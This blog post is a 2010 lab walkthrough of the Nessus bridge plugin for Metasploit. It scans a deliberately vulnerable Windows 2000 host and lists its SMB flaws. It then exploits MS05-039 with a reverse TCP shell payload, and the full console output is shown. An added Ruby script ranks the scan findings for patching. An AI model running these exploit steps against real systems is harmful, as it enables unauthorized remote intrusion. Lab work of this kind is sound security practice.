Playing with the Nessus plugin for Metasploit

Contributed by: Alexandro Silva

Publication date: 12 October 2010

Recently the developer Zate Berg released a Nessus plug-in for the Metasploit Framework; it is available in the development version of MSF.

For the tests I used the following scenario:

  • Debian host with Nessus and Metasploit
  • Target host running Windows 2000, "buggy to the bone"

First I updated MSF and Nessus, and then got on with the fun:

  cd /tmp/pentest_tools/trunk
  svn update
  /opt/nessus/sbin/nessus-update-plugins
  /opt/nessus/sbin/nessus-service &
  ./msfconsole
  
  | |                | |     (_) |
  _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
  | '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
  | | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
  |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
  | |
  |_|
  
  =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
  + -- --=[ 592 exploits - 302 auxiliary
  + -- --=[ 225 payloads - 27 encoders - 8 nops
  =[ svn r10505 updated today (2010.09.28)
  
  msf>

Fun :)

Loading the Nessus plug-in

  msf> load nessus
  
  [*] Nessus Bridge for Nessus 4.2.x
  [+] Type nessus_help for a command listing
  [*] Successfully loaded plugin: nessus

Connecting to the Nessus server...

  msf> nessus_connect localhost:8834 ok
  
  [+] Username:
  alexos
  [+] Password:
  *******
  [*] Connecting to https://localhost:8834/ as alexos
  [*] Authenticated

Listing the policies defined in Nessus:

  msf> nessus_policy_list
  
  [+] Nessus Policy List
  
  ID  Name    Owner   visability
  --  ----    -----    ----------
  1   attack  alexos  private

Starting the scan

  msf> nessus_scan_new 1 alexoscorelabs 192.168.0.6
  
  [*] Creating scan from policy number 1, called "alexoscorelabs" and scanning 192.168.0.6
  [*] Scan started.  uid is af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0

Once the scan had finished, it was time to check the report:

  msf> nessus_report_hosts_ports 192.168.0.6 af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8
  
  [+] Host Info
  
  Port  Protocol  Severity  Service Name  Sev 0  Sev 1  Sev 2  Sev 3
  ----   --------   --------   ------ ------  -----  -----  -----  -----
  0     icmp      1         general       0      2      0      0
  0     tcp       3         general       0      9      0      1
  0     udp       1         general       0      1      0      0
  21    tcp       3         ftp           1      4      2      2
  135   tcp       3         epmap         1      1      0      1
  135   udp       3         epmap?        0      0      0      1
  137   udp       1         netbios-ns    0      1      0      0
  139   tcp       1         smb           1      1      0      0
  445   tcp       3         cifs          1      10     2      12
  1025  tcp       3         dce-rpc       1      1      0      1
  1028  udp       1         dce-rpc       0      1      0      0
  5800  tcp       1         www           1      4      0      0
  5801  tcp       1         www           1      3      0      0
  5900  tcp       3         vnc           1      2      0      1
  5901  tcp       1         vnc           1      3      0      0

Getting details of the vulnerabilities found on the target's port 445 (smb):

  msf> nessus_report_host_detail 192.168.0.6 445 tcp af55d200-77a4-fe0e-7baa-90a11eeab4839ecaf20114aac8b0
  
  [+] Port Info
  
  Port            Severity  PluginID  Plugin Name                                                                                                           CVSS2  Exploit?  CVE            Risk Factor  CVSS Vector
  ----             --------   --------   -----------                                                                                                           -----   --------  ---             -----------   -----------
  cifs (445/tcp)  1         10736     DCE Services Enumeration                                                                                              none   .         .              None         .
  cifs (445/tcp)  1         10785     SMB NativeLanManager Remote System Information Disclosure                                                             none   .         .              None         .
  cifs (445/tcp)  1         10394     SMB Log In Possible                                                                                                   none   false     CVE-1999-0504  None         .
  cifs (445/tcp)  1         11011     SMB Service Detection                                                                                                 none   .         .              None         .
  cifs (445/tcp)  1         10395     SMB Shares Enumeration                                                                                                none   .         .              None         .
  cifs (445/tcp)  1         26920     Windows SMB NULL Session Authentication                                                                               none   false     CVE-1999-0519  None         .
  cifs (445/tcp)  1         17651     Obtains the password policy                                                                                           none   .         .              None         .
  cifs (445/tcp)  3         22034     MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check)           7.5    true      CVE-2006-1314  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
  cifs (445/tcp)  3         19407     MS05-043: Vulnerability in Printer Spooler Service Could Allow Remote Code Execution (896423) (uncredentialed check)  10.0   true      CVE-2005-1984  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         12209     MS04-011: Security Update for Microsoft Windows (835732) (uncredentialed check)                                       10.0   true      CVE-2003-0533  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         12054     MS04-007: ASN.1 Vulnerability Could Allow Code Execution (828028) (uncredentialed check)                              10.0   true      CVE-2003-0818  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  1         10859     SMB LsaQueryInformationPolicy Function SID Enumeration                                                                none   true      CVE-2000-1200  None         .
  cifs (445/tcp)  3         22194     MS06-040: Vulnerability in Server Service Could Allow Remote Code Execution (921883) (uncredentialed check)           10.0   true      CVE-2006-3439  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  
  cifs (445/tcp)  3         19408     MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check)    10.0   true      CVE-2005-1983  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  
  cifs (445/tcp)  3         21193     MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check)           10.0   false     CVE-2005-2120  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  2         18602     SMB svcctl MSRPC Interface SCM Service Enumeration                                                                    5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
  cifs (445/tcp)  2         18585     SMB Service Enumeration via \srvsvc                                                                                   5.0    false     CVE-2005-2150  Medium       CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
  cifs (445/tcp)  3         35362     MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)                 10.0   .         CVE-2008-4834  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  1         26917     SMB Registry : Nessus Cannot Access the Windows Registry                                                              none   .         .              None         .
  cifs (445/tcp)  3         18502     MS05-027: Vulnerability in SMB Could Allow Remote Code Execution (896422) (uncredentialed check)                      10.0   false     CVE-2005-1206  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         11835     MS03-039: Microsoft RPC Interface Buffer Overrun (824146) (uncredentialed check)                                      10.0   true      CVE-2003-0715  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  1         10860     SMB Use Host SID to Enumerate Local Users                                                                             none   true      CVE-2000-1200  None         .
  cifs (445/tcp)  3         11808     MS03-026: Microsoft RPC Interface Buffer Overrun (823980)                                                             10.0   true      CVE-2003-0352  Critical     CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3         11110     MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830)                      7.5    true      CVE-2002-0724  High         CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
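As an added example (not code from the original post or from the Nessus bridge plugin), the `nessus_report_host_detail` table above can be parsed into a remediation list ranked by exploit availability and CVSS, treating the "." the bridge prints for unknown exploit status separately from "false". The sample rows are constructed in the same column layout as the page's output; `parse_host_detail`, `prioritize` and `bulletins` are names chosen here.

```ruby
# Added example: triage a `nessus_report_host_detail` table into a patch-priority list.

# One report row. exploit is true/false, or nil when the bridge printed "."
Finding = Struct.new(:port, :severity, :plugin_id, :name, :cvss, :exploit, :cve, :risk, :vector)

# Constructed rows in the bridge's layout: columns separated by two or more spaces,
# "none"/"." marking missing values (names and ids copied from the report above).
SAMPLE_REPORT = <<~REPORT
  Port            Severity  PluginID  Plugin Name  CVSS2  Exploit?  CVE  Risk Factor  CVSS Vector
  ----            --------  --------  -----------  -----  --------  ---  -----------  -----------
  cifs (445/tcp)  1  10394  SMB Log In Possible  none  false  CVE-1999-0504  None  .
  cifs (445/tcp)  3  22034  MS06-035: Vulnerability in Server Service Could Allow Remote Code Execution (917159) (uncredentialed check)  7.5  true  CVE-2006-1314  High  CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
  cifs (445/tcp)  3  19408  MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution (899588) (uncredentialed check)  10.0  true  CVE-2005-1983  Critical  CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3  21193  MS05-047: Plug and Play Remote Code Execution and Local Privilege Elevation (905749) (uncredentialed check)  10.0  false  CVE-2005-2120  Critical  CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  2  18602  SMB svcctl MSRPC Interface SCM Service Enumeration  5.0  false  CVE-2005-2150  Medium  CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N
  cifs (445/tcp)  3  35362  MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution (958687) (uncredentialed check)  10.0  .  CVE-2008-4834  Critical  CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  cifs (445/tcp)  3  11110  MS02-045: Microsoft Windows SMB Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS (326830)  7.5  true  CVE-2002-0724  High  CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P
REPORT

def parse_host_detail(text)
  text.each_line.map do |line|
    line = line.strip
    next if line.empty? || line.start_with?('Port', '----', '[+]')   # headers / banner
    fields = line.split(/\s{2,}/)                                     # plugin names keep single spaces
    next unless fields.size == Finding.members.size                   # not a data row
    f = Finding.new(*fields)
    f.severity = f.severity.to_i
    f.cvss = f.cvss == 'none' ? nil : f.cvss.to_f                     # informational rows have no score
    f.exploit = { 'true' => true, 'false' => false }[f.exploit]       # "." stays nil (unknown)
    f.cve = nil if f.cve == '.'
    f
  end.compact
end

# Remediation order: public exploit known, then exploit status unknown ("."),
# then no exploit; within a group by CVSS descending. Rows without a CVSS are dropped.
EXPLOIT_RANK = { true => 0, nil => 1, false => 2 }.freeze

def prioritize(findings)
  findings.select(&:cvss).sort_by { |f| [EXPLOIT_RANK[f.exploit], -f.cvss, f.plugin_id] }
end

# Microsoft bulletin ids to apply, deduplicated, in the order given.
def bulletins(findings)
  findings.map { |f| f.name[/\AMS\d{2}-\d{3}/] }.compact.uniq
end

if __FILE__ == $PROGRAM_NAME
  prioritize(parse_host_detail(SAMPLE_REPORT)).each { |f| puts format('%-8s CVSS %-4s exploit=%-5s %s', f.risk, f.cvss, f.exploit.inspect, f.name) }
end
```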

Using MSF, I exploited the vulnerability MS05-039: Vulnerability in Plug and Play Service Could Allow Remote Code Execution:

  msf> use exploit/windows/smb/ms05_039_pnp
  
  msf exploit(ms05_039_pnp)> set RHOST 192.168.0.6
  
  msf exploit(ms05_039_pnp)> set PAYLOAD windows/shell/reverse_tcp
  
  msf exploit(ms05_039_pnp)> set LHOST 192.168.0.3
  
  msf exploit(ms05_039_pnp)> exploit
  
  [*] Started reverse handler on 192.168.0.3:4444
  [*] Connecting to the SMB service...
  [*] Binding to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
  [*] Bound to 8d9f4e40-a03d-11ce-8f69-08003e30051b:1.0@ncacn_np:192.168.0.6[\browser] ...
  [*] Calling the vulnerable function...
  [*] Sending stage (240 bytes) to 192.168.0.6
  [*] Command shell session 1 opened (192.168.0.3:4444 -> 192.168.0.6:1184) at Tue Sep 28 17:24:01 -0300 2010
  [*] Server did not respond, this is expected
  [*] The server should have executed our payload
  
  
  Microsoft Windows 2000 [Version 5.00.2195]
  (C) Copyright 1985-1999 Microsoft Corp.
  
  
  C:\WINNT\system32>
  C:\WINNT\system32> ipconfig
  ipconfig
  
  Windows 2000 IP Configuration
  
  Ethernet adapter Local Area Connection:
  
  Connection-specific DNS Suffix  . :
  IP Address. . . . . . . . . . . . : 192.168.0.6
  Subnet Mask . . . . . . . . . . . : 255.255.255.0
  Default Gateway . . . . . . . . . : 192.168.0.2

MSF add-ons like this are always welcome; another interesting integration is Metasploit with Ettercap for MITM testing.

Source: http://blog.alexos.com.br/?p=1996&lang=en

Author's blog - http://www.alexos.org
